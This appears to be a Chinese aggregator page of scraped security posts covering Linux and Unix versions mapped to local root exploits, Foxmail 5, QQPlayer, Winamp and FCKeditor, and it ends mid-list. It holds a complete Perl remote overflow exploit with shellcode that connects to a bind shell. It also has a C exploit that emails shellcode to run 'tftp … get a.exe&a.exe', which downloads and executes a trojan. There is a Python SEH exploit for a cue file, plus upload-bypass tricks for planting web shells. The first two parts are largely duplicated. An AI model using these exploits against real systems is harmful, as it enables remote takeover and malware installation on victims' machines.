【导语】下面是小编为大家整理的linux各版本对应溢出漏洞总结(溢出代码)漏洞预警(共18篇),仅供大家参考借鉴,希望大家喜欢,并能积极分享!
篇1:linux各版本对应溢出漏洞总结(溢出代码)漏洞预警
2.4.17
newlocal
kmod
2.4.18
brk
brk2
newlocal
kmod
km.2
2.4.19
brk
brk2
newlocal
kmod
km.2
2.4.20
ptrace
kmod
ptrace-kmod
km.2
brk
brk2
2.4.21
km.2
brk
brk2
ptrace
ptrace-kmod
2.4.22
km.2
brk2
brk
ptrace
ptrace-kmod
2.4.22-10
loginx
./loginx
2.4.23
mremap_pte
2.4.24
mremap_pte
Uselib24
2.4.25-1
uselib24
2.4.27
Uselib24
2.6.0
REDHAT 6.2
REDHAT 6.2 (zoot)
SUSE 6.3
SUSE 6.4
REDHAT 6.2 (zoot)
all top from rpm
-------------------------
FreeBSD 3.4-STABLE from port
FreeBSD 3.4-STABLE from packages
freeBSD 3.4-RELEASE from port
freeBSD 4.0-RELEASE from packages
----------------------------
all with wuftpd 2.6.0;
=
wuftpd
h00lyshit
2.6.2
mremap_pte
krad
h00lyshit
2.6.5 to 2.6.10
krad
krad2
h00lyshit
2.6.8-5
krad2
./krad x
x = 1..9
h00lyshit
2.6.9-34
r00t
h00lyshit
2.6.13-17
prctl
h00lyshit
-------------------
2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl
-----------------------------------------------------
Linux
Common
Linux 2.2.x ->Linux kernel ptrace/kmod local root exploit (milw0rm.com/exploits/3)
Linux 2.2.x (on exported files, should be vuln) (milw0rm.com/exploits/718)
Linux <= 2.2.25 ->Linux Kernel 2.x mremap missing do_munmap Exploit (milw0rm.com/exploits/160)
Linux 2.4.x ->Linux kernel ptrace/kmod local root exploit (milw0rm.com/exploits/3)
Linux 2.4.x -> pwned.c - Linux 2.4 and 2.6 sys_uselib local root exploit (milw0rm.com/exploits/895)
Linux 2.4.x ->Linux kernel 2.4 uselib privilege elevation exploit (milw0rm.com/exploits/778)
Linux 2.4.20 ->Linux Kernel Module Loader Local R00t Exploit (milw0rm.com/exploits/12)
Linux <= 2.4.22 ->Linux Kernel <= 2.4.22 (do_brk) Local Root Exploit (milw0rm.com/exploits/131)
Linux 2.4.22 ->Linux Kernel 2.4.22 “do_brk()” local Root Exploit (PoC) (milw0rm.com/exploits/129)
Linux <= 2.4.24 ->Linux Kernel 2.x mremap missing do_munmap Exploit (milw0rm.com/exploits/160)
Linux 2.4.x < 2.4.27-rc3 (on nfs exported files) (milw0rm.com/exploits/718)
Linux <= 2.6.2 ->Linux Kernel 2.x mremap missing do_munmap Exploit (milw0rm.com/exploits/160)
Linux 2.6.11 -> Linux Kernel <= 2.6.11 (CPL 0) Local Root Exploit (k-rad3.c) (milw0rm.com/exploits/1397)
Linux 2.6.13 <= 2.6.17.4 -> Linux Kernel 2.6.13 <= 2.6.17.4 prctl() Local Root Exploit (logrotate) (milw0rm.com/exploits/2031)
Linux 2.6.13 <= 2.6.17.4 -> Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (milw0rm.com/exploits/)
Linux 2.6.11 <= 2.6.17.4 -> h00lyshit.c -Linux Kernel <= 2.6.17.4 (proc) Local Root Exploit (milw0rm.com/exploits/)
Linux 2.6.x < 2.6.7-rc3 (default configuration) (milw0rm.com/exploits/718)
Linux 2.6.x -> pwned.c - Linux 2.4 and 2.6 sys_uselib local root exploit (milw0rm.com/exploits/895)
Debian
Debian 2.2 ->/usr/bin/pileup Local Root Exploit (milw0rm.com/exploits/1170)
Ubuntu
Ubuntu Breezy 5.10 Installer Password Disclosure Vulnerability (milw0rm.com/exploits/1579)
Slackware
Slackware 7.1 ->/usr/bin/Mail Exploit (milw0rm.com/exploits/285)
Mandrake
Mandrake 8.2 -> /usr/mail local exploit (milw0rm.com/exploits/40)
Mandrake <= 10.2 -> cdrdao Local Root Exploit (milw0rm.com/exploits/997)
Suse
SuSE Linux 9.1 -> 'chfn' local root bug (milw0rm.com/exploits/1299)
SuSE Linux 9.2 -> 'chfn' local root bug (milw0rm.com/exploits/1299)
SuSE Linux 9.3 -> 'chfn' local root bug (milw0rm.com/exploits/1299)
SuSE Linux 10.0 -> 'chfn' local root bug (milw0rm.com/exploits/1299)
SuSE Linux Enterprise Server 8 -> 'chfn' local root bug (milw0rm.com/exploits/1299)
SuSE Linux Enterprise Server 9 -> 'chfn' local root bug (milw0rm.com/exploits/1299)
BSD
Freebsd
Freebsd 3.5.1 ->Ports package local root (milw0rm.com/exploits/286)
Freebsd 4.2 ->Ports package local root (milw0rm.com/exploits/286)
FreeBSD 4.x <= 5.4) master.passwd Disclosure Exploit (milw0rm.com/exploits/1311)
Openbsd
Openbsd 2.x - 3.3 ->exec_ibcs2_coff_prep_zmagic() Kernel Exploit (milw0rm.com/exploits/125)
OpenBSD 3.x-4.0 ->vga_ioctl() root exploit (milw0rm.com/exploits/3094)
Sun-Microsystems
Solaris
Solaris 2.4 ->lion24.c (milw0rm.com/exploits/328)
Solaris 2.6 with 107733-10 and without 107733-11 (milw0rm.com/exploits/1182)
Solaris 2.6 with 107733-10 and without 107733-11 (milw0rm.com/exploits/1182)
Solaris 5.5.1 ->X11R6.3 xterm (milw0rm.com/exploits/338)
Solaris 7 with 106950-14 through 106950-22 and without 106950-23 (milw0rm.com/exploits/1182)
Solaris 7 with 106950-14 through 106950-22 and without 106950-23 (milw0rm.com/exploits/1182)
Solaris 7 without patch 107178-03 (milw0rm.com/exploits/714)
Solaris 7 without patch 107178-03 (milw0rm.com/exploits/713)
Solaris 8 without patch 108949-08 (milw0rm.com/exploits/713)
Solaris 8 without patch 108949-08 (milw0rm.com/exploits/714)
Solaris 8 with 109147-07 through 109147-24 and without 109147-25 (milw0rm.com/exploits/1182)
Solaris 8 with 108993-14 through 108993-31 and without 108993-32 (milw0rm.com/exploits/715)
Solaris 8 with 109147-07 through 109147-24 and without 109147-25 (milw0rm.com/exploits/1182)
Solaris 8 with 108993-14 through 108993-31 and without 108993-32 (milw0rm.com/exploits/715)
Solaris 9 without patch 116308-01 (milw0rm.com/exploits/714)
Solaris 9 without patch 116308-01 (milw0rm.com/exploits/713)
Solaris 9 without 113476-11 (milw0rm.com/exploits/715)
Solaris 9 without 112963-09 (milw0rm.com/exploits/1182)
Solaris 9 without 113476-11 (milw0rm.com/exploits/715)
Solaris 9 without 112963-09 (milw0rm.com/exploits/1182)
Solaris 10 (libnspr) Arbitrary File Creation Local Root Exploit (milw0rm.com/exploits/2543)
Solaris 10 (libnspr) constructor Local Root Exploit (milw0rm.com/exploits/2641)
SunOS
SunOS 5.10 Generic i86pc i386 i86pc (milw0rm.com/exploits/1073)
SunOS 5.9 Generic_112233-12 sun4u (milw0rm.com/exploits/1073)
篇2:溢出漏洞:linux各版本对应溢出漏洞总结(溢出代码)
2.4.17
local
kmod
2.4.18
brk
brk2
local
kmod
km.2
2.4.19
brk
brk2
local
kmod
km.2
2.4.20
ptrace
kmod
ptrace-kmod
km.2
brk
brk2
2.4.21
km.2
brk
brk2
ptrace
ptrace-kmod
2.4.22
km.2
brk2
brk
ptrace
ptrace-kmod
2.4.22-10
loginx
./loginx
2.4.23
mremap_pte
2.4.24
mremap_pte
Uselib24
2.4.25-1
uselib24
2.4.27
Uselib24
2.6.0
REDHAT 6.2
REDHAT 6.2 (zoot)
SUSE 6.3
SUSE 6.4
REDHAT 6.2 (zoot)
all top from rpm
-------------------------
FreeBSD 3.4-STABLE from port
FreeBSD 3.4-STABLE from packages
freeBSD 3.4-RELEASE from port
freeBSD 4.0-RELEASE from packages
----------------------------
all with wuftpd 2.6.0;
=
wuftpd
h00lyshit
2.6.2
mremap_pte
krad
h00lyshit
2.6.5 to 2.6.10
krad
krad2
h00lyshit
2.6.8-5
krad2
./krad x
x = 1..9
h00lyshit
2.6.9-34
r00t
h00lyshit
2.6.13-17
prctl
h00lyshit
-------------------
2.4.17 -> local, kmod, uselib24
2.4.18 -> brk, brk2, local, kmod
2.4.19 -> brk, brk2, local, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl
-----------------------------------------------------
Linux
Common
Linux 2.2.x ->Linux kernel ptrace/kmod local root exploit (milw0rm.com/exploits/3)
Linux 2.2.x (on exported files, should be vuln) (milw0rm.com/exploits/718)
Linux <= 2.2.25 ->Linux Kernel 2.x mremap missing do_munmap Exploit (milw0rm.com/exploits/160)
Linux 2.4.x ->Linux kernel ptrace/kmod local root exploit (milw0rm.com/exploits/3)
Linux 2.4.x -> pwned.c - Linux 2.4 and 2.6 sys_uselib local root exploit (milw0rm.com/exploits/895)
Linux 2.4.x ->Linux kernel 2.4 uselib privilege elevation exploit (milw0rm.com/exploits/778)
Linux 2.4.20 ->Linux Kernel Module Loader Local R00t Exploit (milw0rm.com/exploits/12)
Linux <= 2.4.22 ->Linux Kernel <= 2.4.22 (do_brk) Local Root Exploit (milw0rm.com/exploits/131)
Linux 2.4.22 ->Linux Kernel 2.4.22 “do_brk” local Root Exploit (PoC) (milw0rm.com/exploits/129)
Linux <= 2.4.24 ->Linux Kernel 2.x mremap missing do_munmap Exploit (milw0rm.com/exploits/160)
Linux 2.4.x < 2.4.27-rc3 (on nfs exported files) (milw0rm.com/exploits/718)
Linux <= 2.6.2 ->Linux Kernel 2.x mremap missing do_munmap Exploit (milw0rm.com/exploits/160)
Linux 2.6.11 -> Linux Kernel <= 2.6.11 (CPL 0) Local Root Exploit (k-rad3.c) (milw0rm.com/exploits/1397)
Linux 2.6.13 <= 2.6.17.4 -> Linux Kernel 2.6.13 <= 2.6.17.4 prctl Local Root Exploit (logrotate) (milw0rm.com/exploits/2031)
Linux 2.6.13 <= 2.6.17.4 -> Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl Local Root Exploit (milw0rm.com/exploits/2011)
Linux 2.6.11 <= 2.6.17.4 -> h00lyshit.c -Linux Kernel <= 2.6.17.4 (proc) Local Root Exploit (milw0rm.com/exploits/2013)
Linux 2.6.x < 2.6.7-rc3 (default configuration) (
篇3:FtpdInnes 远程溢出Exploit漏洞预警
#!/usr/bin/perl -w
use IO::Socket;
if(!($ARGV[1]))
{
print “Usage: ./Ftpd-innes.pl target host portnn”;
exit;
}
$victim = IO::Socket::INET->new(Proto=>''udp'',
PeerAddr=>$ARGV[0],
PeerPort=>$ARGV[1])
or die “Cannot connect to $ARGV[0] sulla porta $ARGV[1]”;
my $nop0=“x90”x20;
my $asm=“x7cxc5x66x07x12x02x50xc3”;
my $nop1=“x90”x60;
my $nop2=“x90”x10;
my $eip=“x42xfdx60x40”;
#my $eip=“A”x5;
my $shellcode =
“x29xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xed”.
“x7dx09xbfx83xebxfcxe2xf4x11x17xe2xf2x05x84xf6x40”.
“x12x1dx82xd3xc9x59x82xfaxd1xf6x75xbax95x7cxe6x34”.
“xa2x65x82xe0xcdx7cxe2xf6x66x49x82xbex03x4cxc9x26”.
“x41xf9xc9xcbxeaxbcxc3xb2xecxbfxe2x4bxd6x29x2dx97”.
“x98x98x82xe0xc9x7cxe2xd9x66x71x42x34xb2x61x08x54”.
“xeex51x82x36x81x59x15xdex2ex4cxd2xdbx66x3ex39x34”.
“xadx71x82xcfxf1xd0x82xffxe5x23x61x31xa3x73xe5xef”.
“x12xabx6fxecx8bx15x3ax8dx85x0ax7ax8dxb2x29xf6x6f”.
“x85xb6xe4x43xd6x2dxf6x69xb2xf4xecxd9x6cx90x01xbd”.
“xb8x17x0bx40x3dx15xd0xb6x18xd0x5ex40x3bx2ex5axec”.
“xbex2ex4axecxaex2exf6x6fx8bx15x18xe3x8bx2ex80x5e”.
“x78x15xadxa5x9dxbax5ex40x3bx17x19xeexb8x82xd9xd7”.
“x49xd0x27x56xbax82xdfxecxb8x82xd9xd7x08x34x8fxf6”.
“xbax82xdfxefxb9x29x5cx40x3dxeex61x58x94xbbx70xe8”.
“x12xabx5cx40x3dx1bx63xdbx8bx15x6axd2x64x98x63xef”.
“xb4x54xc5x36x0ax17x4dx36x0fx4cxc9x4cx47x83x4bx92”.
“x13x3fx25x2cx60x07x31x14x46xd6x61xcdx13xcex1fx40”.
“x98x39xf6x69xb6x2ax5bxeexbcx2cx63xbexbcx2cx5cxee”.
“x12xadx61x12x34x78xc7xecx12xabx63x40x12x4axf6x6f”.
“x66x2axf5x3cx29x19xf6x69xbfx82xd9xd7x1dxf7x0dxe0”.
“xbex82xdfx40x3dx7dx09xbf”;
$exploit = “x00x01” . $nop0 .$asm.$nop1. $shellcode. $nop2 .$eip. “x00x7ex56x70x60x70x45x69x69x00”;
print $victim $exploit;
print “ + Malicious request sent ...n”;
sleep(2);
print “Done.n”;
close($victim);
$host = $ARGV[0];
print “ + connect to 4444 port of $host ...n”;
sleep(3);
system(“telnet $host 4444”);
exit;
篇4:Foxmail 5远程缓冲区溢出漏洞漏洞预警
注:本文是2月xfocus成员在内部技术交流中提出的,在此之前,启明星辰技术人员已经发现这一漏洞,但未公开细节,xfocus成员听说存在这一漏洞后对Foxmail进行分析,并写出利用代码,
测试环境:win2k sp4+foxmail 5.0.300
以前测试foxmail 4.x的时候曾经发现过溢出漏洞,不过后来一直没时间研究就先放下了,后来听说Foxmail5也有溢出,但是一直没有看见公布。于是没事的时候干脆自己研究一下,测试后发现以前的溢出漏洞已经补上了,不过出了一个新的漏洞。
问题出在PunyLib.dll里面的UrlToLocal函数,估计这是一个用来处理垃圾邮件的链接库,当一封邮件被判定为垃圾邮件时,就会调用UrlToLocal来处理邮件体的“From: ”字段,处理过程中发生堆栈溢出,可以导致执行任意代码。
具体处理过程如下:
.text:10002040 public UrlToLocal
.text:10002040 UrlToLocal proc near
.text:10002040
.text:10002040 arg_0 = dword ptr 4
.text:10002040 arg_4 = dword ptr 8
.text:10002040
.text:10002040 mov eax, dword_1000804C
.text:10002045 mov ecx, dword_10008030
.text:1000204B mov edx, [esp+arg_4]
.text:1000204F push offset aHttp ; “”
.text:10002054 push eax
.text:10002055 mov eax, [esp+8+arg_0]
.text:10002059 push offset unk_10008034
.text:1000205E push ecx
.text:1000205F push edx
.text:10002060 push eax
.text:10002061 call sub_10002070 ;调用10002070,其中参数里保存的是邮件体的“From: ”字段后面的内容
.text:10002070 sub_10002070 proc near ; CODE XREF: UrlToLocal+21p
.text:10002070 ; EmailAdrToLocal+107p
.text:10002070
.text:10002070 var_600 = dword ptr -600h
.text:10002070 var_500 = dword ptr -500h
.text:10002070 var_400 = dword ptr -400h
.text:10002070 var_300 = dword ptr -300h
.text:10002070 var_200 = dword ptr -200h
.text:10002070 var_100 = dword ptr -100h
.text:10002070 arg_0 = dword ptr 4
.text:10002070 arg_4 = dword ptr 8
.text:10002070 arg_8 = dword ptr 0Ch
.text:10002070 arg_C = dword ptr 10h
.text:10002070 arg_10 = dword ptr 14h
.text:10002070 arg_14 = dword ptr 18h
.text:10002070
.text:10002070 mov edx, [esp+arg_0]
.text:10002074 sub esp, 600h
......
.text:100020DF push eax
.text:100020E0 push ecx
.text:100020E1 push ebx
.text:100020E2 call sub_10001A30 ;调用10001A30,就是这个函数里面溢出了
.text:10001A30 sub_10001A30 proc near ; CODE XREF: sub_10002070+72p
.text:10001A30 ; sub_10002290+95p
.text:10001A30
.text:10001A30 var_104 = dword ptr -104h
.text:10001A30 var_100 = dword ptr -100h
.text:10001A30 arg_0 = dword ptr 4
.text:10001A30 arg_4 = dword ptr 8
.text:10001A30 arg_8 = dword ptr 0Ch
.text:10001A30 arg_C = dword ptr 10h
.text:10001A30 arg_10 = dword ptr 14h
.text:10001A30 arg_14 = dword ptr 18h
.text:10001A30
.text:10001A30 sub esp, 104h ;分配0x104字节大小的堆栈,但是拷贝的“From: ”字段最大为0x200
.text:10001A36 push ebx
.text:10001A37 mov ebx, [esp+108h+arg_0]
.text:10001A3E push ebp
.text:10001A3F mov ebp, [esp+10Ch+arg_10]
.text:10001A46 push esi
.text:10001A47 xor esi, esi
......
.text:10001AA9 sub edi, ecx
.text:10001AAB mov eax, ecx
.text:10001AAD mov esi, edi
.text:10001AAF mov edi, edx
.text:10001AB1 shr ecx, 2
.text:10001AB4 rep movsd ;这里进行内存拷贝的时候溢出了,按照“From: ”字段大小拷贝到0x104的缓冲区里
.text:10001AB6 mov ecx, eax
.text:10001AB8 and ecx, 3
.text:10001ABB rep movsb
......
.text:10001AE7 mov edi, [esp+114h+arg_C]
.text:10001AEE shr ecx, 2
.text:10001AF1 rep movsd ;这里有几处地方会对局部变量进行操作,因为这些变量都被覆盖了,所以需要把他们覆盖成可以写的地址,我覆盖的是0x7ffdf220这个地址,应该是PEB的区域,所以必须在后面shellcode里面把这个区域的内容恢复成0
.text:10001AF3 mov ecx, eax
.text:10001AF5 and ecx, 3
.text:10001AF8 rep movsb
......
.text:10001BD7 pop edi
.text:10001BD8 pop esi
.text:10001BD9 pop ebp
.text:10001BDA pop ebx
.text:10001BDB add esp, 104h
.text:10001BE1 retn ;返回的时候就会回到我们的JMP ESP地址去
这个溢出无法覆盖SEH,而且字符串里面不能包含“@,(,,,r,n”这些乱七八糟的字符。shellcode用的是ey4s写的用URLMON下载并运行exe文件的那个。
有些MAIL服务器会把shellcode截断,所以我又改了一下,用比较短的shellcode直接运行tftp来下载程序并运行,测试了一下成功率比原来有所提高,但是容易被防火墙给拦截下来。
/* fmx.c - x86/win32 Foxmail 5.0 PunyLib.dll remote stack buffer overflow exploit
*
* (C) COPYRIGHT XFOCUS Security Team,
* All Rights Reserved
*
* This is unpublished proprietary source code of XFOCUS Security Team.
* It should not be distributed in any form. without express permission
* from XFOCUS Security Team.
*
* -----------------------------------------------------------------------
* Author : xfocus
* : www.xfocus.org
* Maintain : XFOCUS Security Team
* Version : 0.2
*
* Test : Windows server GB/XP professional
* + Foxmail 5.0.300.0
* Notes : unpublished vul.
* Greets : ey4s, and all member of XFOCUS Security Team.
* Complie : cl fmx.c
* Usage : fmx
* mail_addr: email address we wantto hack
* tftp_server: run a tftp server and have a a.exe trojan
* smtp_server: SMTP server don't need login, we send the email thru it
*
* Date : 2004-02-27
* Revised : 2004-03-05
*
* Revise History:
* -03-05 call WinExec addr of Foxmail.exe module to run tftp for down&execute
*/
#include
#include
#include
#pragma comment (lib,“ws2_32”)
//mail body, it's based on a real spam email, heh
unsigned char packet[] =
“From: %srn” //buffer to overrun
“Subject: Hi,manrn”
“MIME-Version: 1.0rn”
“Content-Type: multipart/mixed; boundary=”87122827“rn”
“rn”
“rn”
“--87122827rn”
“Content-Type: text/plain; charset=us-asciirn”
“Content-Transfer-Encoding: 7bitrn”
“rn”
“Trn”
“rn”
“--87122827rn”
“Content-Disposition: attachmentrn”
“Content-Type: Text/HTML;rn”
“ name=”girl.htm“rn”
“Content-Transfer-Encoding: 7bitrn”
“rn”
“rn”
“--87122827--rn”
“rn”
“.rn”;
//tiny shellcode to run WinExec() address in Foxmail.exe module(foxmail 5.0.300)
unsigned char winexec[] =
“x83xecx50xebx0cxb9x41x10xd3x5dxc1xe9x08xffx11xebx08x33xdbx53xe8xecxffxffxff”;
//tiny shellcode to run WinExec() address in Foxmail.exe module(foxmail 5.0.210 BETA2)
unsigned char winexec2[] =
“x83xecx50xebx0cxb9x41x10xa3x5dxc1xe9x08xffx11xebx08x33xdbx53xe8xecxffxffxff”;
#define SMTPPORT 25
int Make_Connection(char *address,int port,int timeout);
int SendXMail(char *mailaddr, char *tftp, char *smtpserver, char *shellcode);
int main(int argc, char * argv[])
{
WSADATA WSAData;
char *mailaddr = NULL;
char *tftp = NULL;
char *smtpserver = NULL;
if(argc!=4)
{
printf(“Usage: %s
return 1;
}
mailaddr=argv[1];
tftp=argv[2];
smtpserver=argv[3];
if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
{
printf(“WSAStartup failed.n”);
WSACleanup();
exit(1);
}
//WinExec() address
SendXMail(mailaddr, tftp, smtpserver, winexec); //WinExec() address in Foxmail.exe module(foxmail 5.0.300)
SendXMail(mailaddr, tftp, smtpserver, winexec2); //WinExec() address in Foxmail.exe module(foxmail 5.0.210 BETA2)
WSACleanup();
return 0;
}
// 建立TCP连接
// 输入:
// char * address IP地址
// int port 端口
// int timeout 延时
// 输出:
// 返回:
// 成功 >0
// 错误 <=0
int Make_Connection(char *address,int port,int timeout)
{
struct sockaddr_in target;
SOCKET s;
int i;
DWORD bf;
fd_set wd;
struct timeval tv;
s = socket(AF_INET,SOCK_STREAM,0);
if(s<0)
return -1;
target.sin_family = AF_INET;
target.sin_addr.s_addr = inet_addr(address);
if(target.sin_addr.s_addr==0)
{
closesocket(s);
return -2;
}
target.sin_port = htons(port);
bf = 1;
ioctlsocket(s,FIONBIO,&bf);
tv.tv_sec = timeout;
tv.tv_usec = 0;
FD_ZERO(&wd);
FD_SET(s,&wd);
connect(s,(struct sockaddr *)&target,sizeof(target));
if((i=select(s+1,0,&wd,0,&tv))==(-1))
{
closesocket(s);
return -3;
}
if(i==0)
{
closesocket(s);
return -4;
}
i = sizeof(int);
getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i);
if((bf!=0)||(i!=sizeof(int)))
{
closesocket(s);
return -5;
}
ioctlsocket(s,FIONBIO,&bf);
return s;
}
//send magic mail
int SendXMail( char *mailaddr, char *tftp, char *smtpserver, char *shellcode)
{
SOCKET csock;
int ret,i=0;
char buf[510], sbuf[0x10000], tmp[500], tmp1[500];
csock = Make_Connection(smtpserver, SMTPPORT, 10);
if(csock<0)
{
printf(“connect err.n”);
exit(1);
}
memset(buf, 0, sizeof(buf));
ret=recv(csock, buf, 4096, 0);
if(ret<=0)
{
printf(“recv err.n”);
exit(1);
}
printf(buf);
ret=send(csock, “HELO serverrn”,strlen(“HELO serverrn”), 0);
if(ret<=0)
{
printf(“send err.n”);
exit(1);
}
memset(buf, 0, sizeof(buf));
ret=recv(csock, buf, 4096, 0);
if(ret<=0)
{
printf(“recv err.n”);
exit(1);
}
printf(buf);
ret=send(csock, “MAIL FROM: info@sina.comrn”,strlen(“MAIL FROM: info@sina.comrn”), 0);
if(ret<=0)
{
printf(“send err.n”);
exit(1);
}
memset(buf, 0, sizeof(buf));
ret=recv(csock, buf, 4096, 0);
if(ret<=0)
{
printf(“recv err.n”);
exit(1);
}
printf(buf);
sprintf(tmp, “RCPT TO: %srn”, mailaddr);
ret=send(csock, tmp,strlen(tmp), 0);
if(ret<=0)
{
printf(“send err.n”);
exit(1);
}
memset(buf, 0, sizeof(buf));
ret=recv(csock, buf, 4096, 0);
if(ret<=0)
{
printf(“recv err.n”);
exit(1);
}
printf(buf);
Sleep(1000);
ret=send(csock, “DATArn”,strlen(“DATArn”), 0);
if(ret<=0)
{
printf(“send err.n”);
exit(1);
}
memset(buf, 0, sizeof(buf));
ret=recv(csock, buf, 4096, 0);
if(ret<=0)
{
printf(“recv err.n”);
exit(1);
}
printf(buf);
printf(“send exploit mail...n”);
memset(sbuf, 0, sizeof(sbuf));
memset(buf, 0, sizeof(buf));
memset(buf, 0x41, sizeof(buf)-1);
memset(tmp, 0, sizeof(tmp));
//strcpy(tmp, winexec);//WinExec() address in Foxmail.exe module(foxmail 5.0.300)
strcpy(tmp, shellcode);//WinExec() address in Foxmail.exe module
strcat(tmp, “cmd /c tftp -i %s get a.exe&a.exe:”);
sprintf(tmp1, tmp, tftp);
memcpy(buf+0x100-strlen(tmp1), tmp1, strlen(tmp1));
*(int *)(buf+0x100)=0x7ffa54cd; //ret addr jmp esp
*(int *)(buf+0x104)=0x80eb80eb; //jmp back
*(int *)(buf+0x108)=0x7ffdf220; //writeable addr
*(int *)(buf+0x110)=0x7ffdf220; //writeable addr
memcpy(buf, “girlx0d”, 5);
sprintf(sbuf, (char *)packet, buf);
ret=send(csock, sbuf,strlen(sbuf), 0);
if(ret<=0)
{
printf(“send err.n”);
exit(1);
}
memset(buf, 0, sizeof(buf));
ret=recv(csock, buf, 4096, 0);
if(ret<=0)
{
printf(“recv err.n”);
exit(1);
}
printf(buf);
printf(“exploit mail sent.n”);
closesocket(csock);
return 0;
}
安全焦点
篇5:QQPlayer CUE文件缓冲区溢出漏洞漏洞预警
#!/usr/bin/env python
#################################################################
#
# Title: QQPlayer cue File Buffer Overflow Exploit
# Author: Lufeng Li of Neusoft Corporation
# Vendor: www.qq.com
# Platform. Windows XPSP3 Chinese Simplified
# Tested: QQPlayer 2.3.696.400
# Vulnerable: QQPlayer<=2.3.696.400p1
#
#################################################################
# Code :
head = ''''''FILE “''''''
junk = ”A“ * 780
nseh =”x42x61x21x61“
seh =”xa9x9ex41x00“
adjust=”x32x42x61x33xcax83xc0x10“
shellcode=(”hffffk4diFkTpj02Tpk0T0AuEE2C4s4o0t0w174t0c7L0T0V7L2z1l131o2q1k2D1l081o“
”0v1o0a7O2r0T3w3e1P0a7o0a3Y3K0l3w038N5L0c5p8K354q2j8N5O00PYVTX10X41PZ41“
”H4A4I1TA71TADVTZ32PZNBFZDQC02DQD0D13DJE2C5CJO1E0G1I4T1R2M0T1V7L1TKL2CK“
”NK0KN2EKL08KN1FKO1Q7LML2N3W46607K7N684H310I9W025DOL1S905A4D802Z5DOO01“)
junk_=”R“*8000
foot =''''''.avi” VIDEO''''''+“x0a”''''''TRACK 02 MODE1/8888''''''+“x0a”+“INDEX 08 08:08:08”
payload=head+junk+nseh+seh+adjust+shellcode+junk_+foot
fobj = open(“poc.cue”,“w”)
fobj.write(payload)
fobj.close()
篇6:Winamp 栈溢出分析及利用漏洞预警
Winamp是一个比较老的播放器,这里主要是通过winamp的一个poc分析,构造一个exp,主程序见附件winamp.exe, poc见附件poc.m3u。
一、 Poc 分析
首先查看poc如下。发现除了前10多个字节为m3u文件格式规定内容外,其它部分均为A。
运行winamp.exe程序,将poc.m3u拖入主界面中,程序直接崩溃。为了查看崩溃时状态,我们将windbg设置为即时调试器。设置在cmd中使用命令:
windbg –I
再次运行poc,自动弹出windbg,发现崩溃状态:
出现异常,主要是esi+4不可写,修改esi=0045000,命令为:
r @esi=00445000
继续运行,停至
eax为41414141,[Eax+0c]处也不可读,且经分析,必须[eax+0c]的第5位为1,程序才会运行至strcpy处,所以修改eax=12c238
继续运行,发现程序运行至41414141,这样我们就完全控制了程序的执行,
二、定位异常
通过构造一个特殊的poc来定位:
定位结果如下:esi=eax=306a4139, 程序最后的eip=6141326a
在poc文件中搜索
可知要绕过异常: 0x11e处的4字节 data需要满足:
[data+4]可读
且Byte ptr[data+c] 第5字节为1
最后选择了一个满足条件的data:719f7bf0
程序覆盖点在0×126处,此处存放jmp esp的地址(这里用7ffa4512,这是个比较通用的jmp esp地址)。
三、构造 exp
完整的exp构造见附件。主要包括4字节绕过异常放在0x11e处,0×126处放jmp esp指令地址,shellcode放在0x12a开始处。
测试:(环境xp sp3)
结果:能成功弹出计算器
附件下载地址: pan.baidu.com/s/1sjoCWMx
篇7:FCK各版本突破漏洞预警
不知道谁的版权-
FCKeditor v2.43版本FCKeditor/editor/filemanager/browser/default/connectors/php/config.php
FCKeditor V2.6.6版本 fckeditor/editor/filemanager/connectors/asp/config.php
查看编辑器版本
FCKeditor/_whatsnew.html
—————————————————————————————————————————————————————————————
2. Version 2.2 版本
Apache+linux 环境下在上传文件后面加个.突破!测试通过,
—————————————————————————————————————————————————————————————
3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。
action=”www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media” method=”post”>Upload a new file:
—————————————————————————————————————————————————————————————
高版本存在 低版本不存在
4.FCKeditor 文件上传“.”变“_”下划线的绕过方法
很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。
4.1:提交shell.php+空格绕过
